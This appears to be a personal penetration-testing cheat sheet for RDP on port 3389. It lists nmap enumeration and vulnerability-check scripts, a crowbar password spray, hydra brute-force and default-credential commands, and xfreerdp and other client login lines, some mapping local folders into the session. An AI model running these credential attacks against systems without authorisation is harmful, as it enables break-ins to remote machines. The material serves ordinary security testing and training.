RDP (3389)
Remote desktop protocol developed by MS that allows users to connect to and control another computer over a network. Provides a GUI for remote access, enabling users to interact with a remote machine as if they were sitting in front of it.
Enumeration
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 $IP -Pn
Password Spray
crowbar -b rdp -s 10.11.1.7/32 -U users.txt -C rockyou.txt
Logging in
xfreerdp3 /cert-ignore /bpp:8 /compression -themes -wallpaper /auto-reconnect /h:1000 /w:1600 /v:192.168.238.191 /u:admin /p:password
xfreerdp3 /u:admin /v:192.168.238.191 /cert:ignore /p:"password" /timeout:20000 /drive:home,/tmp
rdesktop [target] -d [domain] -u [user] -p [password]
remmina -c rdp://[username]:[password]@[target]
krdc rdp://192.168.1.100
Include a folder
xfreerdp /v:192.168.1.100 /u:Administrator /p:Password123 /drive:share,/home/oscar/Downloads/
xfreerdp /v:192.168.1.100 /u:Administrator /p:Password123 /drive:share,.
Bruteforcing
hydra -L users.txt -P pass.txt rdp://[target]
Combination pair
hydra -C SecLists/Passwords/Default-Credentials/rdp-betterdefaultpasslist.txt 192.168.207.183 rdp